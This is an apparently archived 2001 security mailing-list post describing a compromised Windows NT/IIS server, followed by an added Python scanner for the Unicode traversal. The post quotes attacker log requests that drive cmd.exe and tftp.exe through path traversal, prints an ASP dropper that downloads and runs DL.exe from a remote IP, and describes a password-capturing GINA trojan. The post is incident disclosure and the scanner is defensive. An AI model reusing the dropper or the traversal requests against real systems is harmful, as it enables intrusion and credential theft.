OSEC

From: Ron Grove (rgroveHOTMAIL.COM)
Date: Sun Feb 25 2001 - 11:15:18 CST


    Hello,

    Just wanted to share some of the footprints of a hack that we had on one of
    our NT servers. This is not everything, I am sure. It was too important to
    rebuild and secure the server for the users' usage again. If anyone else has
    noticed this please let me know. We are curious what else was put on the
    machine beyond what we found. Attempts were made against other servers as
    well.

    Config:
    Windows NT 4.0 with SP6a
    Runs Exchange 5.5 SP4, IIS 4.0, MS Proxy Server 2.0

    Initially noticed logfile problem with UNICODE exploit. Then noticed
    os2srv.exe running in taskmanager and as a service. os2srv.exe was then
    killed and sud.exe appeared out of nowhere in processes. Can't find sud.exe
    so find is possibly trojaned.

    They initially got in with the UNICODE exploit from a few months back. Here
    is the snip from the logs:

    xxx.xxx.xxx.xxx, -, 2/15/01, 20:41:28, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 234, 140, 1650, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir+c:\,
    xxx.xxx.xxx.xxx, -, 2/15/01, 20:41:54, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 188, 141, 379, 502, 0, GET, /scripts/../../winnt/system32/attrib.exe, E.asp+-r,
    xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:20, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 16, 142, 396, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+del+E.asp,
    xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:26, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 2265, 163, 415, 502, 0, GET, /scripts/../../winnt/system32/tftp.exe, -i+rooted.ntserver.com+get+E.asp,
    xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:34, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 1781, 101, 225, 200, 0, GET, /scripts/E.asp, -,
    xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:37, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 15, 196, 355, 502, 0, GET, /scripts/../../winnt/system32/attrib.exe, E.asp+-r,
    xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:41, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 15, 197, 355, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+del+E.asp,

    We contacted the source IP who had been contacted by another attacked site.
    A CERT report was already generated by the other party. The text of E.asp
    is:

    <%
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set drv = fs.Drives
    dmax = ""
    dmac = 0
    For each d in drv
        If d.Driveletter <> "A" And d.IsReady Then
            If d.AvailableSpace > dmac then
                dmac = d.AvailableSpace
                dmab = d.DriveType
                dmaa = d.TotalSize
                dmad = d.SerialNumber
                dmax = d.DriveLetter
            End If
        End If
    Next
    filename = server.mappath("dl.bat")
    Set tf = fs.CreateTextFile(filename, True)
    tf.WriteLine("echo off")
    tf.WriteLine("cd \Inetpub\scripts")
    tf.WriteLine("startDL:")
    tf.WriteLine("tftp.exe -i 216.205.125.115 get DL.exe")
    tf.WriteLine("if not exist DL.exe goto startDL")
    tf.WriteLine("start /w DL.exe")
    tf.WriteLine("ren 00.D install.bat")
    tf.WriteLine("attrib TFTP* -r")
    tf.WriteLine("attrib DL.exe -r")
    tf.WriteLine("del TFTP*")
    tf.WriteLine("del DL.exe")
    tf.WriteLine("install.bat %1")
    tf.WriteLine("exit")
    tf.Close
    dim command
    dim wshShell
    command = server.mappath("dl.bat") & " " & dmax
    On Error Resume Next
    Set wshShell = CreateObject("WScript.Shell")
    wshShell.Run (command)
    If Err Then
        Set objFSO = Server.CreateObject("scripting.filesystemobject")
        pathname = server.mappath("dl.bat")
        objFSO.DeleteFile pathname
        Set objFSO = Nothing
    Else
        Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" & dmad
    End If
    %>
    ----------------------------
    This file downloads DL.exe from the remote host, executes it (which
    uncompresses a group of files) then runs an install.
    A directory listing follows:
    -----------------------------
    09/24/1997 12:06a 1,942 environ.ksh
    09/24/1997 12:06a 1,323 profile.ksh
    02/20/2001 04:52p 1,289 E.asp
    02/20/2001 05:11p 5,120 DL.exe
    02/20/2001 05:12p 2,201 00.D
    02/20/2001 05:12p 64 01.D
    02/20/2001 05:12p 32,256 02.D
    02/20/2001 05:12p 344 03.D
    02/20/2001 05:12p 349,696 04.D
    02/20/2001 05:12p 28,672 05.D
    02/20/2001 05:12p 24,576 06.D
    02/20/2001 05:12p 70,211 07.D
    02/20/2001 05:12p 18,276 08.D
    02/20/2001 05:12p 28,432 09.D
    02/20/2001 05:12p 35,981 10.D
    02/20/2001 05:12p 427,520 11.D
    02/20/2001 05:12p 12,288 12.D
    02/20/2001 05:12p 6,867 13.D

    00.D gets renamed to install.bat, then executed.

    A new directory also appears about this time. It is found on a different
    drive (in our case E:\ since D:\ was the CDROM). It is under a new
    directory called E:\Adminback0801\root\system\dll and nothing is in it.

    In the C:\Winnt\System32\os2\ directory a new hidden folder called "New" was
    present. It contained:
    FireDaemon.exe
    dir.txt
    login.txt
    RemScan.txt
    SUD.exe
    SUD.bak

    Its security was set to SYSTEM Full Access. FireDaemon was used to create
    an INDEX service and an OS2SRV service.

    A trojan .dll was placed in C:\Winnt\System32 called NewGina.dll.
    HKLM/Software/Windows NT/Software/Winlogon/NewGina key was created with the
    path to the NewGina trojan. A key called OriginalGinaDll was created with
    pcAnywhere's awgina.dll entry. NewGina.dll creates a .tmp file on C:\ that
    captures logon passwords. It is appended to with the current password after
    every logon so that changed passwords are also caught. The file is
    formatted and produced by the NewGina.dll and contains the following text:

    WlxNegotiate.
    WlxInitialize.
    WlxDisplaySASNotice.
    WlxLoggedOutSAS, SasType=1.
    WlxDisplaySASNotice.
    WlxDisplaySASNotice.
    WlxLoggedOutSAS, SasType=1.
    user Administrator has logged on to domain OURSERVER with password
    CURRENT_ADMIN_PASSWORD.
    user is a member of the Administrators group.
    returned profile information:
        type 2
        profile path: (null)
        policy path: \\OURSERVER\netlogon\ntconfig.pol
        server: \\OURSERVER
        LOGONSERVER=\\OURSERVER
    WlxActivateUserShell.
    WlxLoggedOnSAS, SasType=1.
    WlxDisplayLockedNotice.
    WlxWkstaLockedSAS, SasType=1.
    WlxLoggedOnSAS, SasType=1.
    WlxDisplayLockedNotice.
    WlxIsLockOk.
    WlxDisplayLockedNotice.
    WlxIsLockOk.
    WlxDisplayLockedNotice.
    WlxWkstaLockedSAS, SasType=1.
    WlxLoggedOnSAS, SasType=1.
    WlxDisplayLockedNotice.
    WlxIsLockOk.
    WlxDisplayLockedNotice.
    WlxWkstaLockedSAS, SasType=1.
    WlxLoggedOnSAS, SasType=1.

    A new ftp server is also installed called UServ or something like that (I
    forget right now). Too much to try to clean so rebuilding and securing is
    probably the best route.

    Hope this helps someone.

    Thanks,
    Ron
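An added log-scanning example (not part of Ron's message and not code from any tool he names) that parses IIS 4 native-format records like the snippet above, folds the overlong UTF-8 sequences used by the Unicode traversal back to '/' and '\' so that both the raw and the already-decoded form IIS wrote are caught, and flags requests that climb above the web root or reach cmd.exe, tftp.exe or attrib.exe. The sample records, IP addresses and tftp host are constructed.

```python
from urllib.parse import unquote_to_bytes

SYSTEM_TOOLS = {"cmd.exe", "tftp.exe", "attrib.exe"}  # binaries driven in the post's log snippet
# Constructed IIS 4 native-format records (15 comma-separated fields, trailing comma):
# three mirror the post's traversal (one still in overlong '%c0%af' form), two are benign.
SAMPLE_LOG = [
    "10.0.0.5, -, 2/15/01, 20:41:28, W3SVC1, OURSERVER, 10.0.0.1, 234, 140, 1650, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir+c:\\,",
    "10.0.0.5, -, 2/15/01, 20:42:26, W3SVC1, OURSERVER, 10.0.0.1, 2265, 163, 415, 502, 0, GET, /scripts/../../winnt/system32/tftp.exe, -i+tftp.example.invalid+get+E.asp,",
    "10.0.0.5, -, 2/15/01, 20:43:01, W3SVC1, OURSERVER, 10.0.0.1, 20, 150, 400, 200, 0, GET, /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe, /c+dir,",
    "10.0.0.9, -, 2/15/01, 20:45:00, W3SVC1, OURSERVER, 10.0.0.1, 12, 90, 2048, 200, 0, GET, /default.htm, -,",
    "10.0.0.9, -, 2/15/01, 20:45:03, W3SVC1, OURSERVER, 10.0.0.1, 30, 120, 512, 200, 0, GET, /scripts/../scripts/E.asp, -,",
]

def decode_uri(raw):
    """Percent-decode, then fold overlong 2-byte UTF-8 (%c0%af -> '/', %c1%9c -> '\\')
    back to the ASCII byte IIS 4 resolved it to."""
    data, out, i = unquote_to_bytes(raw), bytearray(), 0
    while i < len(data):
        if data[i] in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((data[i] & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(data[i])
            i += 1
    return out.decode("latin-1")

def resolve(path):
    """Collapse '.'/'..'; escaped=True means the request climbed above the virtual root."""
    parts, escaped = [], False
    for seg in decode_uri(path).replace("\\", "/").split("/"):
        if seg == "..":
            escaped = escaped or not parts
            parts = parts[:-1]
        elif seg not in ("", "."):
            parts.append(seg)
    return "/" + "/".join(parts), escaped

def scan(lines):
    """Return (client_ip, time, resolved_path, query, reasons) for suspicious records."""
    findings = []
    for line in lines:
        f = line.rstrip(",").split(", ")
        if len(f) != 15:
            continue  # not an IIS native-format record
        path, escaped = resolve(f[13])
        tool = path.rsplit("/", 1)[-1].lower() in SYSTEM_TOOLS
        if escaped or tool:
            findings.append((f[0], f[3], path, f[14], {"traversal": escaped, "system_tool": tool}))
    return findings
```

Running `scan` over a real IIS log also surfaces the 502 responses seen in the post, since the status field is kept in `f[10]` for further filtering.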